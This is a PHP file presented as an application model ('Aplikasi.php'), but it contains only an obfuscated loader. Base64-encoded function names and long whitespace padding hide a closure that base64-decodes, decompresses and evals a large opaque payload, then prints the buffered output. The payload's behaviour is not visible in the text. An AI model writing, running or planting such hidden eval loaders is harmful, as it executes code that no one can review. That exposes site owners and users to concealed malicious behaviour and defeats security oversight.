<?php 
        $__='printf';$_='Loading app/Models/Aplikasi.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXV2zmzi2fU/V/Q95mKrTU3Wrhw+TPlQqDwebD4ORg5AE6KULEDEGgYnNsYFff+Uk05309Ez3rem+lTvRci3rCLSF2Np7a1uHsl++/Ii//Cjw5mE4H/vx3cPrD9VPePOQD8PfwhOr+OVvTwM/tvnl+P1QDy/XPL9cvv/++4fXLz518/K/XsjX1/d6cZ/Pl38g3vzDkYdUNS9Zoh6pa795+HDoZ6v4Xfhkc29eSkhISPxn4qHsiMJS/3nrEi1LbiffMd+lc/vDx6ApoubHcP2jVJWEhISEhISEhITE/zfI7QwJCQmJ/1w8FPmlerX6kVXliVUPr6VGJCQkJCQk/i18+SDC9kkJtuunwye2qfpo+ro154mh0GP5g++IujJdswQORVcestS67RT1Sl1yKWfTKt1pyDVnyWPjlntP/f52OvzUn+h7E53A+iDLb7D83K6+SX74N6Rqvnsblx/qWeMHlA8pSMYsbI0l4cxlcfnDt6aPz/k2Zk1Bsht16oBh7pHGp0Rn17jNVqVt6m+Rco8p7S/lPpPPQsSXhJRTTgYPfmz/zdvevz1Hi9JvndNSbpxjgQ0t4/W6IkOG+lO/n39D/i67to5hO3TZAuLcBc/4Pi/zV3GP7d/v76M/nmbSWHd/1LLOiAvXf8a/cY+SkpJf+vzb+E/oV/PrUsMacMyWJkDknLj/PXJ/tu9+FiPv+fLpp/rc/mIttwZ6PNS0J8+ZLvJnzXhH03oodbgEa/Yu1aa6SPw2i8shSMeOJUbDXH4tjtZn5w5tqTgz1cOL74FNoUEu2s40hWrZrQ40pXWxPhx/fgSKqkUHlDwxn4M1XKLU78uZ/1DN4m9N6FEMdD9vh72umtJ2JSX/RY7wq/kmFH5++KfnA3SR+vsmP8f8M7t4HL7YE1nDf5T7VVsS68oM3/nz7df7lPmppKSkpKSkpOSfSPirn/dlrv9H5tOP5r0MPun669Yt/MV4fzMfb+/7zRQbM3PYhTlPc+gyQruxy+LHVdTCW8ZhDTt6ilQwhJyc9kndVxtYg3bwik3NQ5vxgjAL6HQhNlCpq1xpH66A7aSxxtTQnWrq+hrpqBvbDki66VWghWqoD31FbCVQlCnUo1vUmlO41H6mW+MeZTNajyrB7DnpnA4gymn/NGMNuLFGW2zzS55mSm4/rvLWvpKu3u2U0QHYxIVrZrivl6o/LHsXLJlGtH06DDniuDqOPU3aFUvhvkrIrvDYkWyYwexRQbqtg8WZ49RpS8VwswWrOfb7BNenPbIg8qxV0tZbqJhqhsiRLv7CUutK0u1C3Hqk/VbJNBUjFE4M39ScUxumDEDb0RGGFlNUG27EmOzoXLTqNrqf88ozaEd3p7BwL3RZYfM9thnJW7ok7rCGmK2pyr2oM4+MOxpS4CbuMqNMnDFfWAydISlUPFGX+IgPcdGAHHvimKuG2KkvQucX5p2mhEfXogc4wuOJdc4UY1jT7nEi7hRBPZoAgRPcWE6o0k2JSFLa5FxyLmSHa4miW5gOFOBhXSKsguSglHh8Ji13SWLEMbd2exd2kUrtWPetfFN7Ys7p3gM3hPAME96UyHJjbNik51vcmmrJnV3cjupOHY7ZkqnArTklw4lovhep3M9a08ELVBBnKp7Ha+FEZ5JcFtjTc6xsbwSbY9a0K7Rhr3JhIxhTDloHwqY8Fw6hSRoqyKkzqDMddrdV4pEm6yCP3dUqt8dnmJI26v0AaNAGHuMVZylpaEBdcIUaMMIWwHxDkyKZaqBRLXFIwxK6LVVGxfXehqnvlQvjSCMLVkAddf4l6UENbJXk60clU8s5b2o/6SAiHQlzfrqiVhG+cFNAex8rv+YeiTJ8MfaJn0HvoOfaaUKNrVPNmBK7PRPlZmTd6MAEIqYeZtDW7/OUg1K35p0Kr1U7vMpt45KrMI7XJsi9oc1TsIGaEeD28Xy31UgDKuCsgam/oB6gBE8uSsahsv0JaX4m7nkW2o9Agw3gsFd7+6AQx4pyBV+xAwPoqh3rOcIaz5haR1k6cKiZftUPTsIHXCGGSTJtChvYtBtG1A07wIe6VIlWJczCmqmEbm2UmGVZDym21WvG+ZH1fr/TeBxhEFTYmGJveA89tsee31KX6thtDcTBUDX+baeCurTBrdDAirggKTf1plhqXDThNYrNNmyezqJfe6fbC8GHM1ub55gMbYz4NlbJmHXGOlvqLfPAmnm0JvphLhDxyg0RsWPYUyLsTK3dsHtccDpkwN6emQ1QSYTelnCubOe56pRzoMMLdoUb6P4OqXTFOrgniGt42eoFoU6IeEpds01QfcKIbvaprwAxb/niY6TR91l3ETEmmpFOapoOz0iFFkDWOrYzPU7ILWksR7TDBSdu0jhQ6GRVbSwabriQF5aN62fUkB427JQkJI/iRxFD4Y2pFiz4oCQcvCoWRrCzNUR83LCO21RvJ9pmqxA5s9BVwBAJA2XqMLHPqDUDMI951oC4cut94lgNIKQvNTgXhPOE+1uGQF+6pRrOwqY1EuSLcwoTNY3j0Sl1to7S4VWERDxpLBT3EJAOnuHanLKjaYjYeRHXgyJWGhGHIJhNjOwB7NfjmmHzsrehAnriYc4XYLOLGF9cOWC/U/z3e3uwRT8+5QTn3MGlom5x48MqHabYHrfC7jcg8dO8d5wi8XkUj3reOEHWmTpIByN32bbQh7TQtiqxTwrrsAjMDOF2iivuCFu2FuFXdpXUI/NaNRdrBcB1X6rgfUgsCnoGyYZPFfevWas6gcLbQKF+RZwN1B2/0G43gJ09wFsDKL6Wo0wTsbLf6ZGCO1rniGyj5HAFOuGFO2x2+pMaCf+tuuhcefWpVPhG2Ikq2qt4AeoeEaX02HvUGaedMp3CbgBUrE95f1oJ/76GTnYL8VhTMe5oNrvyaJ5z1XLKNLuWtpFTbYRgc1gRxxn3uI6K7jCVHJ5KzZ5E3CZExCJIBg5UrMRqdE6wgYKF0j16EnUyY9IahWd5FDtB0d7HY2uZDvKy4ZBo8C12IyNcWBOmdJV1U0f7Ia/67ZWKdSDjtV55T1roGiuAwgWp1jXsYBcr9R6KOAc3fEP6+oQaTvKEb8X4p3LxE5ietKw1QGWbSxU/XnFjGyKGdplidMJesrwbw6hzHITJVDbtmRECgXvPBAhHXqlG2uNZrOFa3tsL6ihFOlcL9KRlx/FeigXQP4atcyWu3wba9iryiLdJMqJQzybSjUeg2wbqLZErsHan0RVtoF2KMew0ciT9YcUQvxTxqCSuk+UuPlNcH0Ga3TJxjDVYF/pZAv3puk+djqDtlYgYE2K4R7oYY++/B3a5BNrhFval6S+XYH38RV45H0Ru9uUea/DTHuzHXP5eD+L2nsN9ttf6Mb+7txG5qHyeRFJSUlJSUlLyj9pT/ZCfSX1ISkpKSkpKSkp+5XRJk7uPUg+SkpKSkpJfGeV3MHzD5VHa/2/uvX54pvUSPLx+8eL//gto3nwov/tU++vr/434Z7K/R/AvP1/wu4f7+8N//3RZ+Ts7X/fv7Hw5h999YTQfp/Cvr/8Hsgfiug==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
